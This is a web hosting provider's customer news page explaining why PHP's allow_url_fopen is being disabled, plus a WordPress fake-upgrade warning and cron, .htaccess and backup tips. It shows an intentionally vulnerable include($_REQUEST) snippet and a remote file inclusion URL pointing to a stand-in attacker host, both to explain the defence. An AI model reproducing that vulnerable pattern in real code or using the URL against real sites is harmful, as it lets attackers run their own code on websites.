Web Hosting Resource

Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.

Currently all Sheffield Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile(”http://feeds.feedburner.com/DilbertDailyStrip”);

to retrieve a remote RSS feed will no longer work.

What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php

“It looks like sites which have not upgraded to 2.6.3 are being exploited in an interesting way whereby a hacker, probably using an automated script, is hacking into sites with the vulnerability and changing the settings of one of the dashboard modules to point to a different feed thereby encouraging people to go to a different site which is offering a dodgy upgrade.”

That was the response of Peter Westwood (one of the lead developers of popular blogging software provider Wordpress) upon news that some of its users with an outdated Wordpress installation may be prompted to download a more compromised version from a spoof website (wordpresZ.org).

It’s important that all customers verify the source, security and legitimacy of any software that they install to their Pipe Ten hosting accounts and pay special attention when upgrading.

Read more at The Register - Fake site punts Trojanised WordPress and additional analysis at the sources blog.

A quick cheat sheet for working with .htaccess files and Apache under Linux. Many of these options/features are also available via the control panel. (more…)

If you have a Linux web hosting plan then you can use the following instructions to create an .htaccess file: (more…)

If they are PHP files intended to be called by the command line then PHP binary should be used at
/hsphere/shared/php4/bin/php
or
/hsphere/shared/php5/bin/php

If it is intended to use them as if they were in the web browser then wget should be used, available at /usr/share/wget
i.e.
/usr/share/wget -v –delete-after http://domain.com/path/to/script.php

For more instructions on how to configure crontabs please take a look at the following instructions: http://www.pipeten.info/h-sphere/direct_access_to_server.html#crontab

For other web server configurations please contact support

Combing the power of our control panel H-Sphere and primary backup solution R1Soft, we are pleased to announce free and instant backups restores for all Linux dedicated solution customers.

This beta functionality allows you to view all restore points (daily or four-hourly usually) and seeds for your server (the last full backup) then simply select what you’d like to restore and to where. There may be a 1 to 15 minute wait depending on what time of day it is.

Please contact support if you’d like to enable this option in your control panel.

Due to popular request we now offer PHP5 support for Linux accounts at no additional cost. Customers wishing to take advantage of this should contact support through the usual methods requesting migration to a PHP5 specific server.

Pipe Ten now offer free crontabs on their Linux Venture, Multihost and Enterprise accounts. Windows Enterprise customers can now also create a free Scheduled Task to run a script on their website at a schedule of their choosing. Contact the support team for more details.

You can tell PHP to show its errors by creating a .htaccess in the root of your domain with the contents ‘php_flag display_errors 1′. This will then show the errors when you visit the PHP page in question.

mod_rewrite is enabled within Apache on our Linux servers as standard and just requires a .htaccess modification to turn the engine on for the domain.